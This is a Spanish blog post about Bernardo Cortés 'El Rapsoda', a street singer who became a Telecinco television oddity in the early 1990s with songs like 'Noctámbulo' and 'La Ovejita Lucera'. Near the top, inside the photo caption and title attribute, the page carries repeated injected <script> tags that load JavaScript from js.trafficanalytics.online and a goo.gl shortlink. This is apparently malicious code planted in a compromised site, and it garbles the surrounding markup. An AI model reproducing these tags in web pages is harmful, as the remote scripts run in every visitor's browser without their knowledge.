El fenómeno ‘Bernardo’

Bernardo Cortés, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script> ‘El Rapsoda’ / FOTO: mtvo-lasmentiras.blogspot.com” style=”width: 550px” title=”Bernardo Cortés, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script> ‘El Rapsoda’ / FOTO: mtvo-lasmentiras.blogspot.com” /><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></p>
<p>Hacía tiempo que tenía en mente esta entrada. Como también hace tiempo de este personaje. Los traumatizados por <a target=aquel Telecinco de culos y tetas han de recordarlo: Bernardo Cortés ‘El Rapsoda’, quizás pionero del universo friki de la cadena mucho antes del desembarco del Tamarismo. También cantaba, aunque no nos dejaría lo suficientemente perplejos cuando hoy hace falta rememorarlo con este artículo.

Cual Chiquito De La Calzada, Cortés obtuvo la fama en su edad dorada del carnet de identidad. Hasta entonces, este jienense anduvo de aquí a allá para ganarse la vida. Se hizo (y es) popular en el barrio marinero de La Barceloneta (sí, en Barcelona), donde se ganaba sus perras cantando a los turistas.

El salto a la popularidad fue a raíz de su participación en un talent show. Y no. No fue Operación Triunfo, sino Qué gente más divertida, presentado en 1991 por los inefables Javier Basilio y Loreto Valverde. Recuerdo aquellos sábados fenomenales, en los que antes de emitir Las Noches de Tal y Tal, aparecía gente extraña a hacer el ganso para recibir el calor de los aplausos.

De repente, aparece Bernardo Cortés, con su presencia ya de por sí… extraordinaria. Dejó caer sus dedos en la guitarra, y convirtió el tema Noctámbulo en todo un hit veraniego. Al día siguiente todo el mundo la tarareaba, y no porque sea especialmente pegadiza. Es que su interpretación… fuera de lo común es lo que los maravilló.

Como los grandes, tuvo incluso sus imitadores. El más célebre es el personaje de Oriol Grau, Palomino (tanto es así que en Cataluña es toda una celebridad y ha ensombrecido al personaje original). Pero también Martes y Trece hicieron en su día una bastada de las suyas. Fue en el especial Que te de concurso de 1992 en TVE1.

Su aparición no fue una más. Caló tanto que le dejaron volver otra semana. Y otra. Y otra. Y otra. Y cuando el programa desapareció, le buscaron recovecos en cualquier otro de la cadena. Fue en el programa del humorista Eugenio, La Chistera, emitido en 1993. Allí se abría paso de entre las mesas de aquel reconvertido ‘club’ para atreverse con el más arriesgado todavía: tener un segundo hit, La Ovejita Lucera. Ese sí que tenía un estribillo que más quisiera Que me quiten lo bailao. “Me gusta cuando bala la ovejita, baaaaa; y cuando le contesta el corderito, beeeee…”.

Pero llegó un momento en que su popularidad descendió, al ritmo que sus apariciones en la televisión nacional. Bueno, como ocurre con tantos otros. Y como esos tantos otros, con el pasar de los tiempos, sigue teniendo admiradores ocultos que lo paran por la calle y le pidan un bis. ¡Porque es un grande!

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

Puedes usar las siguientes etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>